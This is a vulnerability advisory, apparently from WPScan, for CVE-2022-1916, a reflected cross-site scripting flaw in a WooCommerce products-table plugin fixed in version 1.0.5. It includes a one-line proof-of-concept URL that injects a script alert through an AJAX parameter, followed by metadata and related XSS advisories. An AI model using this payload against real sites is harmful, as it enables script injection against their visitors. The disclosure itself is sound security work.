Active Products Tables for WooCommerce < 1.0.5 – Reflected Cross-Site-Scripting | CVE 2022-1916 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(%27xss%27)\u003c/script%3E%22}

Affects Plugins

profit-products-tables-for-woocommerce

Fixed in 1.0.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

d16a0c3d-4318-4ecd-9e65-fc4165af8808

Timeline

Publicly Published

2022-06-01 (about 1 years ago)

Added

2022-06-01 (about 1 years ago)

Last Updated

2023-03-03 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

Cart66 Lite - admin.php cart66-products Page Multiple Field Stored XSS

Published

2023-01-31

Title

Arigato Autoresponder and Newsletter < 2.1.7.2 - Admin+ Stored XSS

Published

2016-04-12

Title

New Year Firework <= 1.1.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Published

2023-11-07

Title

ANAC XML Viewer <= 1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2022-08-09

Title

amCharts: Charts and Maps < 1.4.1 - Contributor+ Stored Cross-Site Scripting